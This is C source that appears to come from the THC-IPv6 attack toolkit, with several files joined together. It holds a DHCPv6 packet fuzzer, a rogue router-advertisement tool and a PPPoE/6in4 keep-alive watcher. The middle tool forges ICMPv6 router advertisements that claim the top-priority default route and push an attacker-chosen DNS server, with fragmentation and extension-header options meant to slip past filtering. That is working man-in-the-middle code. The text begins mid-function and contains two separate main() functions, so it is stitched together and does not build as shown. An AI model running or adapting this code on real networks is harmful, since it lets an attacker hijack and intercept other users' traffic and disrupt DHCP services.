int i, s, len, pkt_len = 0, dlen = 0;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
int state;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
//Parse options
while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) {
switch (i) {
case '1':
do_type = DO_SOL;
break;
case '2':
do_type = DO_REQ;
break;
case '3':
do_type = DO_CON;
break;
case '4':
do_type = DO_REN;
break;
case '5':
do_type = DO_REB;
break;
case '6':
do_type = DO_REL;
break;
case '7':
do_type = DO_DEC;
break;
case '8':
do_type = DO_INF;
break;
case 'm':
fuzz_msg_type = 1;
break;
case 'n':
no_send = atoi(optarg);
break;
case 't':
test_start = atoi(optarg);
break;
case 'e':
test_end = atoi(optarg);
break;
case 'T':
test_end = test_start = atoi(optarg);
break;
case 'F':
use_real_link = 0; // no break
case 'f':
use_real_mac = 0;
break;
case 'p':
ping = atoi(optarg);
break;
case 'd':
do_dns = 1;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
//Check options
if (no_send < 1) {
fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n");
exit(-1);
}
if (test_end < test_start) {
printf("don't f**k up the command line options!\n");
exit(-1);
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac) {
mac6 = thc_get_own_mac(interface);
memcpy(mac, mac6, sizeof(mac));
}
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
//Establish state
if (do_type == DO_SOL || do_type == DO_REB)
state = STATELESS;
else
state = STATEFULL;
// generate full fuzz mask for stateless types and partial for statefull types
strcpy(fuzzbuf, fuzztype_ether);
strcat(fuzzbuf, fuzztype_ip6);
strcat(fuzzbuf, fuzztype_udp);
if (fuzz_msg_type)
strcat(fuzzbuf, fuzztype_dhcp6);
else
strcat(fuzzbuf, fuzztype_dhcp6no);
if (state == STATELESS) {
strcat(fuzzbuf, fuzztype_elapsed_time);
strcat(fuzzbuf, fuzztype_client_identifier);
strcat(fuzzbuf, fuzztype_IA_NA);
if (do_dns)
strcat(fuzzbuf, fuzztype_FQDN);
}
/** Generate packet **/
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
//Add dns option
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
dns_option_hdr_len += sizeof(dnsupdate1);
//Append domain string prefix fuzz mask
if (state == STATELESS) { //<-- Do fuzzbuffer later
for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix
strcat(fuzzbuf, "B");
}
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
dns_option_hdr_len += strlen(dns_name) + 1;
//Append variable length domain string suffix fuzz mask
if (state == STATELESS) {
for (i = 0; i < strlen(dns_name) + 1; ++i)
strcat(fuzzbuf, "B");
}
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
dns_option_hdr_len += sizeof(dnsupdate2);
//Append option request (FQDN request) fuzz mask
if (state == STATELESS){
strcat(fuzzbuf, fuzztype_option_request);
}
}
//Set message type
if (state == STATELESS) {
switch (do_type) {
case DO_SOL:
wdatabuf[0] = 0x01;
break;
case DO_REB:
wdatabuf[0] = 0x06;
break;
default:
break;
}
}
//random src mac
if (!use_real_link)
for (i = 0; i < 8; i++)
src[i + 8] = rand() % 256;
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 1] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
wdatabuf[i + 32] = rand() % 256;
if (!use_real_mac) {
mac[i * 2] = rand() % 256;
mac[i * 2 + 1] = rand() % 256;
}
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
memcpy(wdatabuf + 22, mac, 6);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
return -1;
//Fuzz solicit packet
if (state == STATELESS) {
if (fuzz_loop(pkt, &pkt_len) < 0)
return -1;
}
//Fuzz request, confirm or renew paket
else if (state == STATEFULL) {
//Send a dhcp solicit to discover dhcpv6 servers
if (thc_send_pkt(interface, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Failed to send initial solicit packet\n");
return -1;
}
usleep(75); //<-- I don't really know why this is neccessary but it seems to be
//Construct and fuzz packets using server identifier
got_packet = 0;
time_t start_time = time(NULL);
while(time(NULL) - start_time < timeout) {
while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function
if (got_packet)
break;
}
if (!got_packet)
fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n");
}
pkt = thc_destroy_packet(pkt);
// printf("fuzzbuf: %s\n", fuzzbuf);
return 0;
}
int check_alive(pcap_t * p) {
int ret = -2, len, pkt_len = 0, i;
time_t t;
char wdatabuf[1024];
char *pkt = NULL;
unsigned char *dst = thc_resolve6("ff02::1:2");
unsigned char *mac6 = thc_get_own_mac(interface);
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 1] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
wdatabuf[i + 32] = rand() % 256;
}
memcpy(wdatabuf + 22, mac6, 6);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) {
fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n");
exit(-1);
}
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) {
fprintf(stderr, "Error: Failed to create check allive udp packet header\n");
exit(-1);
}
if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error: Failed to create check allive packet header\n");
exit(-1);
}
// debug = 1;
//Empty packet capture queue
while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);
//Send initial solicit request
try_send_pkt(interface, pkt, &pkt_len);
//Check for response in loop and timeout if we don't get one
t = time(NULL);
while (ret < 0) {
//Got reply packet; server alive!
if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
ret = 1;
//If we still haven't received a packet after 1 second resend the solicit
if (time(NULL) > t + 1 && ret == -2) {
if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { //Don't want to use try_send_pkt as it could take longer than timeout
usleep(75);
thc_send_pkt(interface, pkt, &pkt_len); //Retry sending packet after short time if sending failed
}
ret = -1;
}
//Fail after 4 seconds
if (time(NULL) > t + timeout && ret < 0)
ret = 0;
}
if (ret == 0) {
fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout);
}
// debug = 0;
thc_destroy_packet(pkt);
return ret > 0 ? 1 : 0;
}
int main(int argc, char *argv[]) {
char *routerip, *interface, mac[16] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
unsigned char *dns;
int size, mtu = 1500, i, j, k, cnt;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
pcap_t *p;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "FHDr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(mac, 0, sizeof(mac));
interface = argv[optind];
mtu = thc_get_mtu(interface);
if (argc - optind >= 5)
mtu = atoi(argv[optind + 4]);
if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
if (argc - optind >= 4 && argv[optind + 3] != NULL)
ip6 = thc_resolve6(argv[optind + 3]);
else
ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
frip6 = ip6;
frint = interface;
frmac = mac6;
if (argc - optind >= 4 && argv[optind + 2] != NULL)
dns = thc_resolve6(argv[optind + 2]);
else
dns = thc_resolve6("ff02::fb");
routerip = argv[optind + 1];
if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr);
routerip6 = thc_resolve6(routerip);
route6 = thc_resolve6(routerip);
if (routerip6 == NULL || size < 1 || size > 128) {
fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
exit(-1);
}
if (size < 48 || size > 64)
fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
if (dns == NULL) {
fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
exit(-1);
}
if (ip6 == NULL) {
fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
exit(-1);
}
if (mtu < 1 || mtu > 65536) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
if (mac6 == NULL) {
fprintf(stderr, "Error: mac address in invalid\n");
exit(-1);
}
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
i = 128 - size;
j = i / 8;
k = i % 8;
if (k > 0)
j++;
memset(route6 + 16 - j, 0, j);
if (k > 0)
route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);
// buf[3] = 250; // 0-3: reachable timer
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = size; // prefix length
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i = 48;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x03; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x20; // 56-71 address: 2000::
i += 15;
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x07; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0xfc; // 56-71 address: fc::
i += 15;
// dns option
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // 74-75 reserved
memset(buf + i, 1, 4); // validity time
i += 4;
memcpy(buf + i, dns, 16); // dns server
i += 16;
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (i = 0; i <= do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
// init pcap
printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
while (1) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sleep(5);
}
return 0;
}
int main(int argc, char *argv[]) {
char sndbuf[128], data[] = { 0x09, 0x0a, 0x00, 0x0c, 0xfa, 0xce, 0xba, 0xbe, 0x1f, 0x1e, 0x1d, 0x1c };
time_t passed = 0;
pcap_t *p;
thc_ipv6_hdr hdr;
int sndbuflen = 0, i;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "adp")) >= 0) {
switch(i) {
case 'a':
active = 1;
break;
case 'd':
debug = 1;
break;
case 'p':
passive = 1;
break;
default:
fprintf(stderr, "Error: invalid option -%c\n", i);
exit(-1);
}
}
if (getenv("THC_IPV6_PPPOE") != NULL)
type = 1;
else if (getenv("THC_IPV6_6IN4") != NULL)
type = 2;
if (type == 0) {
fprintf(stderr, "Error: neither the THC_IPV6_PPPOE nor THC_IPV6_6IN4 environment variable is set\n");
exit(-1);
}
if (type == 2 && active)
fprintf(stderr, "Error: active ping6 sending in for THC_IPV6_6IN4 is not possible. Please use thcping6 or alive6 to perform the active alive packet sending.\n");
interface = argv[optind];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
printf("Started %s keep-alive watcher on %s (Press Control-C to end) ...\n", type == 1 ? "PPPoE" : "6in4", argv[optind]);
if (active == 1 && type == 1) {
if ((p = thc_pcap_init_promisc(interface, "it does not matter what we put here")) == NULL) {
fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
exit(-1);
}
memcpy(sndbuf, do_hdr, do_hdr_size);
sndbuf[18 + do_hdr_off] = 0x00;
sndbuf[19 + do_hdr_off] = sizeof(data) + 2;
sndbuf[20 + do_hdr_off] = 0xc0;
sndbuf[21 + do_hdr_off] = 0x21;
memcpy(sndbuf + do_hdr_size, data, sizeof(data));
sndbuflen = do_hdr_size + sizeof(data);
hdr.pkt = sndbuf;
hdr.pkt_len = sndbuflen;
while (1) {
thc_pcap_check(p, (char *) intercept, NULL);
usleep(100);
if (passed <= time(NULL)) {
if (thc_send_pkt(interface, (unsigned char*) &hdr, &sndbuflen) < 0) {
fprintf(stderr, "Error: could not send packet to interface %s\n", interface);
return -1;
}
passed = time(NULL) + 15;
}
}
} else {
thc_pcap_function(interface, "it does not matter what we put here", (char *) intercept, 1, NULL);
fprintf(stderr, "Error: Could not set interface into promiscious mode\n");
exit(-1);
}
return -1; // never reached unless error
}
